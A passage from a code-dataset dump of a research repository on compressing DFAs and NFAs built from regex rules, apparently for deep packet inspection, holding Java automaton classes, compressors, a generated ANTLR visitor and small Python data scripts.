"is_vendor": false,
"language": "Java",
"length_bytes": 1331,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 43,
"path": "/src/main/java/main/debug/RecursiveStress.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.debug;\n\nimport automaton.algo.compressor.heuristic.DfaCompressor;\nimport automaton.dfa.Dfa;\nimport automaton.dfa.DfaGenerator;\n\npublic class RecursiveStress {\n public static void main(String[] args) {\n DfaGenerator generator = new DfaGenerator(132L);\n// while (true) {\n// Dfa dfa = generator.generateNext();\n// try {\n// System.out.println(\"===\");\n// dfa.print();\n// new RecursiveCompressorStatic().compress(dfa);\n//\n// int sz = dfa.nodesCount();\n// Main.compress(dfa);\n// assert sz == dfa.nodesCount() : sz + \" \" + dfa.nodesCount();\n// } catch (AssertionError e) {\n// e.printStackTrace();\n// return;\n// }\n// }\n\n\n while (true) {\n Dfa dfa = generator.generateNext();\n try {\n System.out.println(\"===\");\n dfa.print();\n new DfaCompressor().compress(dfa);\n\n int sz = dfa.nodesCount();\n new DfaCompressor().compress(dfa);\n assert sz == dfa.nodesCount() : sz + \" \" + dfa.nodesCount();\n } catch (AssertionError e) {\n e.printStackTrace();\n return;\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6587395668029785,
"alphanum_fraction": 0.6694411635398865,
"avg_line_length": 41.099998474121094,
"blob_id": "d10073ae8b792b66ef8058e89d99a28940c64875",
"content_id": "d8fabf7a072cba2397a4a5e6653b4e34478bdc07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 20,
"path": "/py_util/process_top10.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "## 1\nimport pandas as pd\n\n# df = pd.read_csv('./data/refined/top10.csv')\ndf = pd.read_csv('./data/refined/top10recursive.csv')\ndf = df.iloc[range(10),:]\ndf['Best'] = df[['Recursive', 'Recursive2', 'HeuristicThenRecursive', 'MinRootDist', 'MaxRootDist']].min(axis=1)\nprint(df)\nprint('Total rules: {}'.format(df['size'].sum()))\nprint('Sum of Minimized: {}'.format(df['Minimized'].sum()))\nprint('Sum of ThompsonModified: {}'.format(df['ThompsonModified'].sum()))\nprint('Sum of Heuristic: {}'.format(df['Heuristic'].sum()))\nprint('Sum of HeuristicThenRecursive: {}'.format(df['HeuristicThenRecursive'].sum()))\nprint('Sum of Recursive: {}'.format(df['Recursive'].sum()))\nprint('Sum of Sum-of-single: {}'.format(df['Sum_of_single'].sum()))\nprint('Sum of Best: {}'.format(df['Best'].sum()))\n\nprint(df[['Heuristic', 'ChromaticNumberSimple']])\n\n## ds"
},
{
"alpha_fraction": 0.5294498205184937,
"alphanum_fraction": 0.5333333611488342,
"avg_line_length": 31.733051300048828,
"blob_id": "2318c0757dd201069861f98f83445b9c3b9bf586",
"content_id": "f5a1929a955f951d61bd8816eb6bcf3cdc51217c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7725,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 236,
"path": "/src/main/java/automaton/nfa/Nfa.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.nfa;\n\nimport automaton.transition.*;\nimport util.MyList;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class Nfa {\n private State start;\n private List<State> terminals;\n\n public Nfa(boolean isTerminal) {\n start = new State();\n terminals = new ArrayList<>(4);\n if (isTerminal) {\n terminals.add(start);\n }\n }\n\n public Nfa(State start, List<State> terminals) {\n this.start = start;\n this.terminals = terminals;\n }\n\n public Nfa(Transition t) {\n terminals = new ArrayList<>(4);\n start = new State();\n State fin = new State();\n start.addEdge(t, fin);\n terminals.add(fin);\n }\n\n public void append(Nfa other) {\n if (this == other) {\n throw new IllegalArgumentException(\"Cannot connect nfa with itself\");\n }\n for (State terminal : terminals) {\n terminal.addEdge(new EpsilonTransition(), other.start);\n }\n terminals = other.terminals;\n }\n\n public static Nfa concat(Collection<Nfa> items) {\n Nfa result = new Nfa(true);\n for (Nfa nfa : items) {\n result.append(nfa);\n }\n return result;\n }\n\n public static Nfa union(Collection<Nfa> other) {\n State newStart = new State();\n State newTerminal = new State();\n other.forEach(nfa -> newStart.addEdge(EpsilonTransition.epsilonTransition, nfa.start));\n other.forEach(nfa ->\n nfa.terminals.forEach(terminal ->\n terminal.addEdge(EpsilonTransition.epsilonTransition, newTerminal)\n )\n );\n return new Nfa(newStart, Collections.singletonList(newTerminal));\n }\n\n public void closure() {\n State newStart = new State();\n State newTerminal = new State();\n newStart.addEdge(new EpsilonTransition(), start);\n start.addEdge(new EpsilonTransition(), newTerminal);\n terminals.forEach(terminal -> terminal.addEdge(EpsilonTransition.epsilonTransition, newTerminal));\n newTerminal.addEdge(new EpsilonTransition(), newStart);\n start = newStart;\n terminals = Collections.singletonList(newTerminal);\n }\n\n public Nfa copy() {\n Map<State, State> bijection = new HashMap<>();\n Queue<State> queue = new ArrayDeque<>();\n queue.add(start);\n State newStart = new State();\n bijection.put(start, newStart);\n while (queue.size() > 0) {\n State cur = queue.poll();\n State newCur = bijection.get(cur);\n for (Pair<Transition, State> edge : cur.getEdges()) {\n State target = edge.getSecond();\n State newTarget;\n if (bijection.containsKey(target)) {\n newTarget = bijection.get(target);\n } else {\n newTarget = new State();\n bijection.put(target, newTarget);\n queue.add(target);\n }\n newCur.addEdge(edge.getFirst(), newTarget);\n }\n }\n List<State> newTerminals = terminals.stream().map(bijection::get).collect(Collectors.toList());\n return new Nfa(newStart, newTerminals);\n }\n\n public void makeOptional() {\n terminals.forEach(terminal -> start.addEdge(EpsilonTransition.epsilonTransition, terminal));\n }\n\n public Nfa buildRepeated(int times) {\n Nfa cur = new Nfa(true);\n for (int i = 0; i < times; i++) {\n Nfa next = this.copy();\n cur.append(next);\n }\n\n return cur;\n }\n\n public State getStart() {\n return start;\n }\n\n public List<State> getTerminals() {\n return terminals;\n }\n\n public boolean test(String s) {\n return testHeader(s, true);\n }\n\n public boolean testHeader(String s, boolean addHeader) {\n if (addHeader) {\n s = (char) 257 + s + (char) 256;\n }\n // TODO: better solution\n boolean success = false;\n\n Set<State> states = new HashSet<>();\n states.add(start);\n\n Queue<State> checkEpsilons = new ArrayDeque<>(states);\n State.traverseEpsilons(checkEpsilons, states);\n success |= states.stream().anyMatch(State::isTerminal);\n\n for (int i = 0; !success && i < s.length(); i++) {\n HashSet<State> newStates = new HashSet<>();\n\n for (State state : states) {\n for (Pair<Transition, State> edge : state.getEdges()) {\n Transition transition = edge.getFirst();\n State target = edge.getSecond();\n if (!(transition instanceof EpsilonTransition) &&\n !newStates.contains(target) &&\n transition.test(s.charAt(i))) {\n newStates.add(target);\n }\n }\n }\n\n checkEpsilons = new ArrayDeque<>(newStates);\n State.traverseEpsilons(checkEpsilons, newStates);\n\n states = newStates;\n success |= states.stream().anyMatch(State::isTerminal);\n }\n// return terminals.stream().anyMatch(states::contains);\n if (!success && s.length() > 0) {\n return testHeader(s.substring(1), false);\n }\n return success;\n }\n\n public void close(int id) {\n terminals.forEach(terminal -> terminal.setTerminal(id));\n }\n\n public void close() {\n close(1);\n }\n\n public void setupTail() {\n State fin = new State();\n fin.addEdge(new RangeTransition((char) 0, Transitions.MAX_CHAR), fin);\n fin.setTerminal(0);\n Nfa finNfa = new Nfa(fin, MyList.of(fin));\n append(finNfa);\n }\n\n public static Nfa parseNfa(String s) {\n String[] lines = s.split(\"\\n\");\n String[][] dataLines = new String[lines.length][0];\n for (int i = 0; i < lines.length; i++) {\n dataLines[i] = lines[i].split(\" \");\n }\n HashMap<Integer, List<Pair<Character, Integer>>> mp = new HashMap<>();\n\n int i = 0;\n List<Integer> terminalIds = new ArrayList<>();\n while (dataLines[i].length == 1) {\n terminalIds.add(Integer.parseInt(dataLines[i][0]));\n i++;\n }\n for (; i < dataLines.length; i++) {\n String line = lines[i];\n String[] dataLine = line.split(\" \");\n int a = Integer.parseInt(dataLine[0]);\n int b = Integer.parseInt(dataLine[1]);\n mp.putIfAbsent(a, new ArrayList<>());\n for (char c : dataLine[2].toCharArray()) {\n assert c < Transitions.MAX_CHAR : \"\" + c;\n mp.get(a).add(new Pair<>(c, b));\n }\n }\n ArrayList<State> states = new ArrayList<>();\n int size = Integer.max(\n mp.keySet().stream()\n .reduce(Integer::max)\n .orElse(0),\n mp.values().stream()\n .flatMap(Collection::stream)\n .map(Pair::getSecond)\n .reduce(Integer::max)\n .orElse(0)) + 1;\n for (int j = 0; j < size; j++) {\n states.add(new State());\n }\n mp.forEach((a, b) -> {\n b.forEach(edge -> {\n states.get(a).addEdge(new SingleElementTransition(edge.getFirst()), states.get(edge.getSecond()));\n });\n });\n\n for (int id : terminalIds) {\n states.get(id).setTerminal(1);\n }\n\n return new Nfa(states.get(0), terminalIds.stream().map(states::get).collect(Collectors.toList()));\n }\n}\n"
},
{
"alpha_fraction": 0.6764705777168274,
"alphanum_fraction": 0.6960784196853638,
"avg_line_length": 33,
"blob_id": "b2098261e707f2a94900b70cabf2daa5efda29e1",
"content_id": "3760c4a17036ece6fc8ba5cb1412d46d17938b8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 510,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 15,
"path": "/src/main/java/main/io/Static.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.io;\n\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\n\npublic class Static {\n public static String INPUT = \"./input\";\n public static String TOP_10 = INPUT + \"/top10\";\n public static String TOP_10_GROUPS = TOP_10 + \"/top10groups.txt\";\n public static String FILTERED = INPUT + \"/filtered.txt\";\n public static String VALIDATION = \"./output/graph/validation\";\n public static String SINGLE_DFA = INPUT + \"/single/single_dfa.txt\";\n\n public static boolean DEBUG_RUN = false;\n}\n"
},
{
"alpha_fraction": 0.48197969794273376,
"alphanum_fraction": 0.48401015996932983,
"avg_line_length": 38.400001525878906,
"blob_id": "1add8c5e2cf01ec8b705a6419c67f2afe8f6971e",
"content_id": "3eaba9f84ccac477a0eeef9093dde771432cf5db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3940,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 100,
"path": "/src/main/java/automaton/algo/compressor/heuristic/ColorizationCompressor.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.heuristic;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport intgraph.ColorizatorSimple;\nimport intgraph.IntGraph;\nimport main.debug.HeuristicColors;\nimport util.IntMonitor;\nimport util.Utils;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\npublic class ColorizationCompressor {\n ArrayList<Node> ordered;\n HashMap<Node, Integer> index;\n\n IntMonitor __sizeMonitor = new IntMonitor(\"Nodes remaining\", 50, IntMonitor.Mode.LINEAR);\n\n public void compress(Dfa dfa) {\n boolean progress = true;\n while (progress) {\n progress = false;\n IntGraph graph = buildGraph(dfa);\n if (__sizeMonitor.update(index.size())) {\n Utils.writeTo(\"./output/graph/checkpoints/colors/g\" + HeuristicColors.groupId1 + \"/at\" + index.size() + \".txt\",\n dfa.print(Dfa.PrintingMode.SERIALIZE));\n }\n// System.err.println(\"Nodes remaining: \" + ordered.size());\n List<List<Integer>> colors = new ColorizatorSimple().colorize(graph);\n// System.err.println(\"Colors found: \" + ordered.size());\n if (colors.size() != dfa.nodesCount()) {\n progress = true;\n Map<Integer, Node> mapping = new HashMap<>();\n for (List<Integer> colorEntries : colors) {\n Node colorNode = new Node();\n boolean anyTerminal = false;\n for (Integer entry : colorEntries) {\n mapping.put(entry, colorNode);\n Node oldNode = ordered.get(entry);\n if (oldNode.isTerminal()) {\n colorNode.setTerminal(oldNode.getTerminal());\n assert !anyTerminal;\n anyTerminal = true;\n }\n }\n }\n for (List<Integer> colorEntries : colors) {\n HashMap<Character, Node> newEdges = new HashMap<>();\n colorEntries.forEach(entryId -> {\n ordered.get(entryId).getEdges().forEach((c, node) -> {\n Node newNode = mapping.get(index.get(node));\n Node __replaced = newEdges.put(c, newNode);\n assert __replaced == null || __replaced == newNode;\n });\n });\n mapping.get(colorEntries.get(0)).setEdges(newEdges);\n }\n dfa.setStart(mapping.get(index.get(dfa.getStart())));\n }\n }\n }\n\n public IntGraph buildGraph(Dfa dfa) {\n index = new HashMap<>();\n ordered = new ArrayList<>(dfa.allNodes());\n for (int i = 0; i < ordered.size(); i++) {\n index.put(ordered.get(i), i);\n }\n IntGraph graph = new IntGraph(ordered.size());\n for (int i = 0; i < ordered.size(); i++) {\n Node a = ordered.get(i);\n Map<Character, Node> aEdges = a.getEdges();\n for (int j = 0; j < i; j++) {\n Node b = ordered.get(j);\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n\n if (a.isTerminal() || b.isTerminal()) {\n failed = true;\n } else {\n for (Map.Entry<Character, Node> entry : aEdges.entrySet()) {\n char c = entry.getKey();\n Node target = entry.getValue();\n if (bEdges.containsKey(c) && bEdges.get(c) != target) {\n failed = true;\n }\n }\n }\n\n if (failed) {\n graph.addEdge2(i, j);\n }\n }\n }\n return graph;\n }\n}\n"
},
{
"alpha_fraction": 0.6531165242195129,
"alphanum_fraction": 0.6558265686035156,
"avg_line_length": 35.900001525878906,
"blob_id": "6233e80928dd84492dbbed1227b95674189daa23",
"content_id": "2b2dcbbb10914b9313c18e410f7476a84dbbbee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 10,
"path": "/input/select.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "\nwith open('./numbers.txt') as numbers:\n selected_numbers = list(map(int, numbers.read().rstrip().split(', ')))\n\nwith open('./selected.txt') as filtered:\n rules_list = list(filtered.read().rstrip().split('\\n'))\n\nselected_list = [rules_list[i - 1] for i in selected_numbers]\n\nwith open('./output.txt', 'w') as selected:\n selected.write(\"\\n\".join(selected_list))"
},
{
"alpha_fraction": 0.5992708802223206,
"alphanum_fraction": 0.6045989990234375,
"avg_line_length": 43.02469253540039,
"blob_id": "119647beb97a29b9d6be66c1616e0f996ebd4c67",
"content_id": "4334c295138177e1b1efbee1603dd8d65881d3ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3566,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 81,
"path": "/src/main/java/automaton/transition/Transitions.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.transition;\n\nimport parsing.ParsingError;\nimport parsing.RegexConfig;\nimport util.MyList;\nimport util.MySet;\n\nimport java.util.*;\n\npublic class Transitions {\n final private static Map<String, Transition> transitionMap = generateTransitionMap();\n final public static char MAX_CHAR = 257;\n\n private static HashMap<String, Transition> generateTransitionMap() { // TODO: pass config\n HashMap<String, Transition> transitionMap = new HashMap<>();\n transitionMap.put(\"\\\\n\", new SingleElementTransition('\\n'));\n transitionMap.put(\"\\\\t\", new SingleElementTransition('\\t'));\n transitionMap.put(\"\\\\r\", new SingleElementTransition('\\r'));\n transitionMap.put(\"\\\\f\", new SingleElementTransition('\\f'));\n transitionMap.put(\"$\", new EofTransition()); // TODO: special character\n transitionMap.put(\"^\", new StartTransition());\n char[] symbols = { '.', '/', '\\\\', '-', '?', '(', ')', ':', '^', '\\'', ',', ';', '=', '<', '>', '*', '&', '{',\n '}', '|', '+', '%', '!', '_', '[', ']' };\n for (char symbol: symbols) {\n transitionMap.put(\"\\\\\" + symbol, new SingleElementTransition(symbol));\n }\n\n Set<Character> sClass = MySet.of('\\n', '\\t', '\\r', '\\f', ' ');\n transitionMap.put(\"\\\\s\", new CollectionTransition(sClass));\n\n transitionMap.put(\"\\\\h\", new SingleElementTransition('\\t')); // TODO: support Unicode / filter rules\n\n Transition digitTransition = new RangeTransition('0', '9');\n transitionMap.put(\"\\\\d\", digitTransition);\n\n Transition alphaTransition1 = new RangeTransition('a', 'z');\n Transition alphaTransition2 = new RangeTransition('A', 'Z');\n CollectionTransition wordTransition = new CollectionTransition(alphaTransition1, alphaTransition2);\n wordTransition.addMore(new SingleElementTransition('_'));\n wordTransition.addMore(digitTransition);\n transitionMap.put(\"\\\\w\", wordTransition);\n\n transitionMap.put(\"\\\\S\", new ComplementTransition(transitionMap.get(\"\\\\s\")));\n transitionMap.put(\"\\\\D\", new ComplementTransition(transitionMap.get(\"\\\\d\")));\n transitionMap.put(\"\\\\W\", new ComplementTransition(transitionMap.get(\"\\\\w\")));\n\n transitionMap.put(\"\\\\i\", new CollectionTransition(wordTransition, new SingleElementTransition(':')));\n\n return transitionMap;\n }\n\n public static Transition ofString(String s, RegexConfig config) {\n return ofStringImpl(s, config, false);\n }\n\n public static Transition ofStringImpl(String s, RegexConfig config, boolean literal) {\n if (s.equals(\".\")) {\n return new RangeTransition((char) 0, (char) 255);\n }\n if (literal) {\n if (s.equals(\"$\") | s.equals(\"^\")) {\n return new SingleElementTransition(s.charAt(0));\n }\n }\n if (transitionMap.containsKey(s)) {\n return transitionMap.get(s);\n }\n if (s.length() == 1) {\n char c = s.charAt(0);\n if (config.isCaseInsensitive() && Character.isAlphabetic(c)) {\n List<Character> list = MyList.of(Character.toUpperCase(c), Character.toLowerCase(c));\n return new CollectionTransition(list);\n }\n return new SingleElementTransition(c);\n }\n if (s.startsWith(\"\\\\x\")) {\n return new SingleElementTransition((char) Integer.parseInt(s.substring(2), 16));\n }\n throw new ParsingError(\"Unexpected character sequence for transition: `\" + s + \"`\");\n }\n}\n"
},
{
"alpha_fraction": 0.6318840384483337,
"alphanum_fraction": 0.6405797004699707,
"avg_line_length": 37.44444274902344,
"blob_id": "47500156fc99f93bf157eb5892f320fb7663978e",
"content_id": "381630b2bdd99c03cef500d29cc6a50a03d3ba53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 9,
"path": "/input/remove_used.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "with open('./ind660.txt') as used_fs:\n used = set(used_fs.read().rstrip().split('\\n'))\n\nwith open('./filtered.txt') as filtered_fs:\n rules = list(filtered_fs.read().rstrip().split('\\n'))\n\nwith open('./selected.txt', 'w') as selected_fs:\n selected = [rule for rule in rules if rule not in used]\n selected_fs.write(\"\\n\".join(selected))"
},
{
"alpha_fraction": 0.6988285183906555,
"alphanum_fraction": 0.7001065015792847,
"avg_line_length": 34.30826950073242,
"blob_id": "17fde64646875f830d051c77a824a4e028105fc8",
"content_id": "c948fa59d95b4edc9fba9b48d1e5d1a344992512",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4695,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 133,
"path": "/src/main/generated/antlr/RegexBaseVisitor.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "// Generated from F:/repo/java/dpi-fp/src/main/grammar\\Regex.g4 by ANTLR 4.8\npackage antlr;\nimport org.antlr.v4.runtime.tree.AbstractParseTreeVisitor;\n\n/**\n * This class provides an empty implementation of {@link RegexVisitor},\n * which can be extended to create a visitor which only needs to handle a subset\n * of the available methods.\n *\n * @param <T> The return type of the visit operation. Use {@link Void} for\n * operations with no return type.\n */\npublic class RegexBaseVisitor<T> extends AbstractParseTreeVisitor<T> implements RegexVisitor<T> {\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitStart(RegexParser.StartContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitParams(RegexParser.ParamsContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharset(RegexParser.CharsetContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharsetRange(RegexParser.CharsetRangeContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharsetValues(RegexParser.CharsetValuesContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr(RegexParser.ExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr1(RegexParser.Expr1Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitPureExpr(RegexParser.PureExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCharacter(RegexParser.CharacterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitSpecial(RegexParser.SpecialContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRepeatedExpr(RegexParser.RepeatedExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitNumber(RegexParser.NumberContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRangeCounter(RegexParser.RangeCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitLBorderCounter(RegexParser.LBorderCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRBorderCounter(RegexParser.RBorderCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExactCounter(RegexParser.ExactCounterContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitOptionalExpr(RegexParser.OptionalExprContext ctx) { return visitChildren(ctx); }\n}"
},
{
"alpha_fraction": 0.4749999940395355,
"alphanum_fraction": 0.48586955666542053,
"avg_line_length": 33.074073791503906,
"blob_id": "62f5bbb83c2021608333cb3d03f4a4431617f7a3",
"content_id": "3a6feac753dce8b64858c6a896a72f2fb5d62fac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 108,
"path": "/src/main/java/automaton/dfa/DfaGenerator.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.dfa;\n\nimport java.util.*;\nimport java.util.logging.Logger;\nimport java.util.stream.Collectors;\n\npublic class DfaGenerator {\n// private final int MAX_NODES = 20;\n// private final double EDGE_PROB = 0.2;\n// private final char ALPHA_BORDER = 'c';\n// private final double TERMINAL_PROB = 0.33;\n\n private final int MAX_NODES = 20;\n private final double EDGE_PROB = 0.4;\n private final char ALPHA_BORDER = 'f';\n private final double TERMINAL_PROB = 0.33;\n\n private Random random;\n private int nNodes;\n private ArrayList<Node> nodes;\n private HashMap<Node, Integer> nodeIds;\n\n private int nRuns = 0;\n\n public DfaGenerator() {\n random = new Random(131);\n }\n\n public DfaGenerator(Long seed) {\n random = new Random(seed);\n }\n\n public Dfa generateNext() {\n nRuns++;\n Logger.getGlobal().info(\"Generation #\" + nRuns);\n nNodes = random.nextInt(MAX_NODES) + 2;\n nodes = new ArrayList<>(nNodes);\n nodeIds = new HashMap<>(nNodes);\n for (int i = 0; i < nNodes; i++) {\n Node node = new Node();\n nodes.add(node);\n nodeIds.put(node, i);\n }\n\n for (int i = 0; i < nNodes; i++) {\n Node node = nodes.get(i);\n if (i > 0 && random.nextDouble() <= TERMINAL_PROB) {\n node.setTerminal(Collections.singletonList(i));\n } else {\n for (char c = 'a'; c <= ALPHA_BORDER; c++) {\n if (random.nextDouble() <= EDGE_PROB) {\n node.addEdge(c, nodes.get(random.nextInt(nNodes - 1)));\n }\n }\n }\n }\n\n return shrinkStage1(new Dfa(nodes.get(0)));\n }\n\n private Dfa shrinkStage1(Dfa dfa) {\n if (nRuns == 48) {\n nRuns = 100;\n }\n List<Integer> mergeTargets = new ArrayList<>(nNodes);\n for (int i = 0; i < nNodes; i++) {\n Node node = nodes.get(i);\n List<Node> collectedTerminals = new Dfa(node).allNodes().stream()\n .filter(Node::isTerminal)\n .collect(Collectors.toList());\n if (collectedTerminals.size() == 0) {\n mergeTargets.add(-1);\n } else if (collectedTerminals.size() == 1) {\n mergeTargets.add(collectedTerminals.get(0).getTerminal().get(0));\n } else {\n mergeTargets.add(null);\n }\n }\n for (int i = 0; i < nNodes; i++) {\n Integer targetTerminal = mergeTargets.get(i);\n if (targetTerminal == null) {\n Node node = nodes.get(i);\n node.setEdges(node.getEdges().entrySet().stream()\n .map(entry -> {\n Integer newTarget = mergeTargets.get(nodeIds.get(entry.getValue()));\n if (newTarget != null) {\n if (newTarget == -1) {\n return null;\n }\n entry.setValue(nodes.get(newTarget));\n }\n return entry;\n })\n .filter(Objects::nonNull)\n .collect(Collectors.toMap(Map.Entry::getKey, Map.Entry::getValue)));\n }\n }\n Integer newStartId = mergeTargets.get(nodeIds.get(dfa.getStart()));\n if (newStartId != null) {\n if (newStartId == -1) {\n return generateNext();\n }\n return new Dfa(nodes.get(newStartId));\n }\n return dfa;\n }\n\n}\n"
},
{
"alpha_fraction": 0.6912083029747009,
"alphanum_fraction": 0.6938068270683289,
"avg_line_length": 40.23214340209961,
"blob_id": "acd8ed2ff1c51fbb11f371efb5eb05b5d2ab4105",
"content_id": "c4ce973ce06c81bc9d7d169f3dec0edf85c39000",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2309,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 56,
"path": "/src/main/java/main/graph/DeserializeMetric.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.graph;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorStatic;\nimport automaton.dfa.Dfa;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\nimport static main.Main.compress;\n\npublic class DeserializeMetric {\n public static void main(String[] args) throws IOException {\n// Dfa modified = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/result.txt\")), Dfa.ParsingMode.DESERIALIZE);\n Dfa modified = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/dfa_minimized_610.txt\")), Dfa.ParsingMode.DESERIALIZE);\n\n// Dfa dfaSingleMin = minimizeHopcroft(convert(Nfa.union(nfasSingle)));\n// System.out.println(\"Single-terminal-minimized: \" + dfaSingleMin.nodesCount());\n\n// Dfa combined = convert(Nfa.union(nfas));\n// System.out.println(\"Combined: \" + combined.nodesCount());\n// Dfa dfaMin = minimizeHopcroft(combined);\n// System.out.println(\"Minimized: \" + dfaMin.nodesCount());\n\n// System.out.println(\"Minimized-cut: \" + (dfaMin.cutCount() + nfas.size()));\n\n// Dfa modified = new ThompsonModified().run(nfas);\n System.out.println(\"ThompsonModified: \" + modified.nodesCount());\n// Utils.writeTo(\"./output/graph/result.txt\", modified.print(Dfa.PrintingMode.SERIALIZE));\n\n\n\n// Dfa modifiedMin = minimizeHopcroft(modified);\n\n// Dfa modifiedCopy = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/result.txt\")), Dfa.ParsingMode.DESERIALIZE);\n Dfa modifiedCopy = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./output/graph/dfa_minimized_610.txt\")), Dfa.ParsingMode.DESERIALIZE);\n new RecursiveCompressorStatic().compress(modifiedCopy);\n System.out.println(\"ThompsonModifiedRecursive: \" + modifiedCopy.nodesCount());\n int x = 